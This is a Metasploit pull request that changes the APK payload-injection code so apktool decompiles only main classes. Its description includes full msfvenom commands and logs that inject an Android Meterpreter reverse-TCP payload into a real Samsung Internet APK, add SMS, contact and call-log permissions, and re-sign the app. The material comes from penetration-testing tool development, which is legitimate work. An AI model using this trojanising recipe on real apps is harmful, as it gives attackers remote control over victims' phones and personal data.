### PR TITLE
Msf::Payload::Apk: apktool: Decompile only main classes

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -240,10 +240,10 @@ class Msf::Payload::Apk
     check_apktool_output_for_exceptions(check_apktool)
 
     apk_v = Rex::Version.new(check_apktool.split("\n").first.strip)
-    unless apk_v >= Rex::Version.new('2.0.1')
-      raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
+    unless apk_v >= Rex::Version.new('2.4.1')
+      raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.4.1."
     end
-    unless apk_v >= Rex::Version.new('2.5.1')
+    unless apk_v >= Rex::Version.new('2.7.0')
       print_warning("apktool version #{apk_v} is outdated and may fail to decompile some apk files. Update apktool to the latest version.")
     end
 
@@ -295,7 +295,7 @@ class Msf::Payload::Apk
     end
 
     print_status "Decompiling original APK..\n"
-    apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/original.apk", '-o', "#{tempdir}/original"])
+    apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/original.apk", '--only-main-classes', '-o', "#{tempdir}/original"])
     check_apktool_output_for_exceptions(apktool_output)
 
     print_status "Decompiling payload APK..\n"


### PR DESCRIPTION
@timwr 

Fixes #17631

Tested using:

* https://www.apkmirror.com/apk/samsung-electronics-co-ltd/samsung-internet-for-android/samsung-internet-for-android-11-0-00-73-release/samsung-internet-browser-11-0-00-73-android-apk-download/

I've tested that these changes allow the APK to be decompiled and rebuilt successfully, but haven't done any further testing (does the payload still work? is there any reason why would ever want to decompile other DEX files?).


# Before

```
# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.7.0 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Baksmaling assets/A3AEECD8.dex...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_tab_n_badge_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_action_bar_background_divider_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_section_divider_default_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-desk-mdpi-v8/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-tvdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
Exception in thread "main" org.jf.dexlib2.dexbacked.DexBackedDexFile$NotADexFile: Not a valid dex magic value: cf 77 4c c7 9b 21 01 cd
	at org.jf.dexlib2.util.DexUtil.verifyDexHeader(DexUtil.java:93)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.getVersion(DexBackedDexFile.java:157)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:81)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:184)
	at org.jf.dexlib2.dexbacked.ZipDexContainer$1.getDexFile(ZipDexContainer.java:181)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:89)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:37)
	at brut.androlib.Androlib.decodeSourcesSmali(Androlib.java:103)
	at brut.androlib.ApkDecoder.decode(ApkDecoder.java:151)
	at brut.apktool.Main.cmdDecode(Main.java:175)
	at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed
```

# After

```
# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.sec.android.app.sbrowser.husvm
[*] Loading /tmp/d20230220-2705253-uvqwjj/original/smali/com/sec/android/app/sbrowser/SBrowserApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230220-2705253-uvqwjj/output.apk
[*] Aligning /tmp/d20230220-2705253-uvqwjj/output.apk
[*] Signing /tmp/d20230220-2705253-uvqwjj/aligned.apk with apksigner
Payload size: 76491245 bytes
Saved as: asdf.apk
```
